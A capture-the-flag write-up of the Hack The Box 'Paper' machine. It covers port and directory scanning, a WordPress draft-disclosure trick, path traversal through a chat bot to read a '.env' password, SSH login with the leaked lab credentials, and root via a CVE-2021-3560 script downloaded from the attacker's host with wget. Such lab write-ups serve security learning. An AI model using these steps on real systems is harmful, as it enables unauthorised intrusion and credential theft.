Paper Machine HTB
Last updated
Was this helpful?
Last updated
Was this helpful?
└──╼$ nmap –sCV 10.10.11.143
We found 3 Open Ports (22, 80 and 443), and some details like its OS is CentOS, but nothing is very useful here, so let’s see the website.
And there’s nothing here it just a Test Page, so let’s see another Directories in this website by Gobuster Scanning.
└──╼$ gobuster dir -u http://10.10.11.143/ –w /usr/share/wordlists/dirb/common.txt
Let’s take a look at this Manual Page.
Again nothing is useful here too, so Trying to find another something useful than that like The Response of the website.
└──╼ $ curl –IL 10.10.11.143
And finally something useful … we found useful HTTP Header “X-Backend-Server” and this header is used to return the name of the back end webserver (internal/hidden) that may be found behind the IP .
So we can edit out /etc/hosts file to include this IP with this HostName Like that:
└──╼ $ echo “10.10.11.143 office.paper” >> /etc/hosts
Now let’s open the website by its Host Name.
And here we are the Hidden Page Opened now, so let’s make another Gobuster Scanning on this new page.
└──╼$ gobuster dir -u http://office.paper/ –w /usr/share/wordlists/dirb/common.txt
Opining /wp-admin page, and found login WordPress Page.
Let’s scan this WordPress Page by WpScan
└──╼$ wpscan --url office.paper
We found the Version of this WordPress is 5.2.3
Searching for an Exploit for this Version.
└──╼$ searchsploit wordpress 5.2.3
Get it and found an exploit ”47690.md”,
And when we try it at the website like that
http://office.paper/?static=1
We got this Secret Registration Subdomain:
http://chat.office.paper/register/8qozr226AhkCHZdyY
Then add the new Subdomain to our Hosts File “/etc/hosts”
└──╼ $ echo “10.10.11.143 chat.office.paper” >> /etc/hosts
We got Register Page for Rocket Chat when we open it.
Let’s going in…
We found in the general Chat a Bot Called ”Recyclops” let’s have a Direct Message with it.
And when typing “help” we found some available commands in it like:
1- What time is it?
2- What new files are in your sale directory?
3- Why did the salesman crossed the road?
4- What's the content of file x in your sales directory?
And the two command that will be useful for us is the Second & the forth Questions (The File Content & The content of the Directory)
Trying to list the Current directory by this command recyclops list , we notice that we have the user "dwight" on this machine.
List the Previous directory recyclops list ./../ , and found directory looks interesting “hubot”
And found in it file called “.env” now try to open it by this command recyclops file ../hubot/.env .
and we got a Password in it called “Queenofblad3s!23”.
Now we Have this credentials “dwight:Queenofblad3s!23”
So now Let’s Try to connect by SSH by this credentials “dwight:Queenofblad3s!23”
└──╼$ ssh dwight@10.10.11.143
And we got the User Flag
└──╼$ cat user.txt
So let’s escalate our privileges right Now!
we can search aboutn the OS Version by this command
└──╼$ uname -a
And by searchin on google i got a CVE for it (CVE-2021-3560).
And this is the exploit for this CVE (CVE-2021-3560.py).
Now let’s Transfer the file from our devices to the target machine by Python Server
└──╼$ python3 -m http.server 8383
And get the file from my machine like that:
└──╼$ wget ”http://10.10.16.24:8383/CVE-2021-3560.py”
Then run it using Python3
└──╼$ python3 CVE-2021-3560.py
And now we own this machine, and got the Root Flag ;)
Congratulation Machine has been Pwned!!
